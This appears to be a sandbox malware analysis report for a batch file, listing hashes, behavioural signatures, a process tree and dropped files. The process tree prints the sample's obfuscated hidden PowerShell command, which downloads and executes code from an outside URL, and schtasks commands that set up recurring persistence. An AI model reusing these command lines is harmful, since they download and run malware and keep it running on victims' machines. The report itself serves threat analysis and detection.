Analysis
-
max time kernel
111s -
max time network
41s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
08-10-2022 08:19
Static task
static1
Behavioral task
behavioral1
Sample
OutPut2.bat
Resource
win7-20220812-en
General
-
Target
OutPut2.bat
-
Size
21KB
-
MD5
c32b1f1bb8eda7a1e148c1cdf014f23b
-
SHA1
af0cc28285fc57632751f970ba3040bb1af2faa0
-
SHA256
8a0dc53293a9c974b1884f315f724024713523a6cc95e5bb4abee5fdaf79a9b6
-
SHA512
f7d04d94d7dbabcf7aff4493745660efd65321c2d3e1c2a5c2fea4d02ecbcf90d77e322ef13d257ae263aadbd4cab6a4f237b349b8be0e3e30e3e31f6732980e
-
SSDEEP
96:VMzFOMzFJMzFLMzFeMzFzMzFJMzFTMzFiMzFJMzFLMzFUHQeMzFLMzF2MzFqMzFN:OVqYFQqwxqYgQFYNpdiohUPOzfXwQ9j
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 892 powershell.exe 6 892 powershell.exe 8 892 powershell.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1592 schtasks.exe 748 schtasks.exe -
Kills process with taskkill 3 IoCs
pid Process 1372 taskkill.exe 1044 taskkill.exe 1556 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 892 powershell.exe 892 powershell.exe 892 powershell.exe 1376 powershell.exe 1188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 892 powershell.exe Token: SeDebugPrivilege 1372 taskkill.exe Token: SeDebugPrivilege 1044 taskkill.exe Token: SeDebugPrivilege 1556 taskkill.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 1188 powershell.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 1968 wrote to memory of 1976 1968 cmd.exe 27 PID 1968 wrote to memory of 1976 1968 cmd.exe 27 PID 1968 wrote to memory of 1976 1968 cmd.exe 27 PID 1976 wrote to memory of 892 1976 cmd.exe 28 PID 1976 wrote to memory of 892 1976 cmd.exe 28 PID 1976 wrote to memory of 892 1976 cmd.exe 28 PID 892 wrote to memory of 1760 892 powershell.exe 29 PID 892 wrote to memory of 1760 892 powershell.exe 29 PID 892 wrote to memory of 1760 892 powershell.exe 29 PID 1760 wrote to memory of 336 1760 WScript.exe 30 PID 1760 wrote to memory of 336 1760 WScript.exe 30 PID 1760 wrote to memory of 336 1760 WScript.exe 30 PID 336 wrote to memory of 1592 336 cmd.exe 32 PID 336 wrote to memory of 1592 336 cmd.exe 32 PID 336 wrote to memory of 1592 336 cmd.exe 32 PID 336 wrote to memory of 748 336 cmd.exe 33 PID 336 wrote to memory of 748 336 cmd.exe 33 PID 336 wrote to memory of 748 336 cmd.exe 33 PID 336 wrote to memory of 1372 336 cmd.exe 34 PID 336 wrote to memory of 1372 336 cmd.exe 34 PID 336 wrote to memory of 1372 336 cmd.exe 34 PID 336 wrote to memory of 1044 336 cmd.exe 36 PID 336 wrote to memory of 1044 336 cmd.exe 36 PID 336 wrote to memory of 1044 336 cmd.exe 36 PID 336 wrote to memory of 1556 336 cmd.exe 37 PID 336 wrote to memory of 1556 336 cmd.exe 37 PID 336 wrote to memory of 1556 336 cmd.exe 37 PID 808 wrote to memory of 1720 808 taskeng.exe 39 PID 808 wrote to memory of 1720 808 taskeng.exe 39 PID 808 wrote to memory of 1720 808 taskeng.exe 39 PID 1720 wrote to memory of 1724 1720 WScript.exe 40 PID 1720 wrote to memory of 1724 1720 WScript.exe 40 PID 1720 wrote to memory of 1724 1720 WScript.exe 40 PID 1724 wrote to memory of 1376 1724 cmd.exe 42 PID 1724 wrote to memory of 1376 1724 cmd.exe 42 PID 1724 wrote to memory of 1376 1724 cmd.exe 42 PID 808 wrote to memory of 604 808 taskeng.exe 43 PID 808 wrote to memory of 604 808 taskeng.exe 43 PID 808 wrote to memory of 604 808 taskeng.exe 43 PID 604 wrote to memory of 1436 604 WScript.exe 44 PID 604 wrote to memory of 1436 604 WScript.exe 44 PID 604 wrote to memory of 1436 604 WScript.exe 44 PID 1436 wrote to memory of 1188 1436 cmd.exe 46 PID 1436 wrote to memory of 1188 1436 cmd.exe 46 PID 1436 wrote to memory of 1188 1436 cmd.exe 46
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\OutPut2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\cmd.exeCMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\App\xx.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\System32\cmd.execmd /c ""C:\ProgramData\App\xx.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:336 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn App /sc minute /mo 5 /tr "C:\ProgramData\App\cAppc.vbs"6⤵
- Creates scheduled task(s)
PID:1592
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn det /sc minute /mo 1 /tr "C:\ProgramData\App\cAppc.vbs"6⤵
- Creates scheduled task(s)
PID:748
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM schtasks.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM powershell.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cmd.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {515C3CF8-F8FC-427E-A2C1-E72B29CB7999} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\System32\cmd.execmd /c ""C:\ProgramData\App\cAppc.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS14⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\System32\cmd.execmd /c ""C:\ProgramData\App\cAppc.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS14⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264KB
MD5b385ec653fef60833ca284dcfff71bff
SHA1612981ecf896a7ef09496894d8059f6a9570cf2a
SHA25676a4b8b505e22defbbd1ba2b577bafe4c4311d2d329f3d29cf3e804a7dd191e8
SHA51200f9155acd9aa8fb82c051fb4a27ee5e5b35229f69e0a20525dbcd85c2bf74025b7cc5608e1680683c4959ebfb4ad90811e006bed63e66acd6f1755005c9ba81
-
Filesize
81B
MD56d2d36c3cc7bea993801e5febf7db1c8
SHA1962ca57c247334f79d40e55aa30612c5dfe96c12
SHA25683c47147832482038f4ac9867d5b16ccb78640d9b39d0860805b25db86609a68
SHA512751d5f167617c427697343895988e5b036eff7ee8c358ba35d764378a928b813ee798b5c2e0f67a8dac4622fd5c61708ab0823f9f1498e7d07db4bfe9f466c5d
-
Filesize
5KB
MD55392a92ca835d8812a79a1ee6dac0892
SHA1cb56f654f054542c538f492c4d437d65e4f9bba7
SHA2564ab24fc3a3b34b6b7b57d5fbffba6831ed4c7a9c5c31bfd97aeb603d6bd5f2c5
SHA51202175ebd71040d878818dadb2dda855ddc9a43b1dcd625c1943bedc09b3cba48e4debd7b2401025bc992c0ca38dc96e3f2746fe1518808290c2b07132470829d
-
Filesize
260B
MD515b09a88be68cc160232d8766f7e3be7
SHA1b3468aaafd099c639405574b719a201b8df00b02
SHA256d7128567b26c84039b6fd667ab0d1a443dbbdf15e0550a26e015cbab95979ae2
SHA5120cd81076a2242363bd692b12287ac31e35332b272bd1ded78d9dbd55cee3c8947cce3f45cc4b24bb6c303032d2dfb6efe87edff49fa242b4013e56eaa1cd0460
-
Filesize
4KB
MD51de9b452f5231a8281209d61a101bcb5
SHA127ea6c5470a58226b7a1ab8986d3d0bec87ae3eb
SHA2560920a4adad558df5820ab49ab8566d9dbea771da520a754c2652fa5548852f64
SHA512e22f70de118f0b6b53e1277ee1c07f30e9d7356db36d858025725b1b0ee2cd677ac926fcb5587243fb342ef7fcff498a68eb6d8ebef3497b5c450468f0d7c4ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5730429ada915bc92547b959c4a1bb3fc
SHA15829c66b1a067b46638f4a058f01561f860b5a94
SHA256c5b7fcc658f45b88f636cc5ba5ae9fcd7d3014892ae7f6148e2089314a759281
SHA512f2305c5e323ac948d552f33a12552c8c10cfafaecf7730c7a5acce578ffd6c32c4913543bd4e40cdc31a45ce54b393a46c22f183cd4553d32971109bfc6ee7f8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5dd66478cab07d8ff579e3588808ff6a2
SHA1d7685c2f9e5356ed17f237d5069395ada52c25f2
SHA256caff4b2741f414e6e0bfbe7814d9a36518401a54eaed19ac133a8a69b5ff27fa
SHA51287730479ebccfd54277293c78ff66a49686037fbb7d9d60a756253b6950fc398237c56e754fe8dfc47786e2a9b14cb50d44ff8e1bc7063bec9f09bd2db98578e